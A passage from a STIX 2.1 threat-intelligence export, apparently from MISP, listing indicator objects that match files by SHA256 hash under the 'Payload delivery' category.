|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699a-c11c-422a-ad13-45fb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699b-5440-432b-bd89-4a6f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699c-3b70-4c81-9cf8-4f24950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699d-5e18-44e6-b953-4ac9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699e-c1ac-4f9a-a18b-4249950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db699f-d250-471d-b333-431c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'abd5cf43abd878e8d7633e19bc309de840ec4e12624cabd99ac6152d9455d44f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a0-3ac4-41f9-a11b-4379950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b84328459e911de77827392db7967bb9ebefe90e365a8369ab8716a6b50aa5a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a1-0c08-458a-90ce-40cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dfdb3b363d82d552b8b1a1de116f6e68c2a055170a5c83f43575ad3ae9b90ddb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a2-d614-4433-82f9-4cc8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e5ef4e95831f24f345b4c00834b88b19098cada540da6aa60ba7ca861d20fd95']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a3-dd5c-4b68-b49c-483f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '8e04108c5e164c1f077f0abeac10fdf295207e1f160350d999527ce23f078385']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a4-791c-4925-87bb-4161950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a5-ef58-4f1c-b4e2-4910950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a6-73e4-4493-8762-4133950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a7-5d64-4ad8-927d-4e54950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a8-47ac-4e84-88e9-49f5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9f7e640951097f84b7ab42514ec2eae951b3c1b817c68efa9daae4345d2695b2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69a9-1778-4086-a145-4b0e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '88e075627d93bbf43eabd699ca9afac0cceaf43f18f8c7ac43f2a7f93a247b55']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69aa-cb88-4d61-833f-4efa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '06b8fa74196fa7edccb77a4bde000928a8ec15d56c5dd3c4af7237f876fc0991']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ab-d46c-4c3c-8344-4e79950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c6db6e329d73616e6869bbb4f86fbdcab88c948176253df82729a2010493b09a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ac-b5d4-4180-b0fd-49a9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '93867701be29f7154cf9f4bc72faad9e9859f4db3ed3030c04fcf03bab085b10']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ad-42a4-4072-91f4-4e63950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7f4fc4475cf86628ac5277c363fbe0bf47e87e726e4247eabe788e4440bf5bff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ae-171c-4af3-be3b-435b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'fd348ee3cc11647a87a7a065cc8dcc63cacad3349da567ce6cb5eb3f7d0a6ad1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b0-3a58-4a94-9244-4fd2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'fb6aa05b6c9a6d394d33f2a6cdd4a9c626eaf784990b69aab15e6ebc51908739']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b1-d35c-4a5a-af85-47f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '90aa424f52bd1f227ace86348c707ecc711c808526805915c50dfebf4bc49186']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b1-1ea8-49de-b5c7-47ed950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b131f561551cfe16804cffa4ed1651576ddb9e880913d245c23c7756311e474c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b2-5e70-4efa-9bf6-4cdc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1d9ea027c8494e88148aa1b2d87bd13cf753902445423ac63257b89ccff1dd9e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b3-c0ac-4d42-8c0a-41c1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b4-3eb0-46e1-945c-4dab950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b5-fd04-4b5d-9427-44e4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b6-2c20-4823-8bd7-40cd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b7-cd48-47f1-8d80-4545950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b8-b0ac-4f54-af8a-46c5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69b9-59c0-437a-b7d5-40f9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
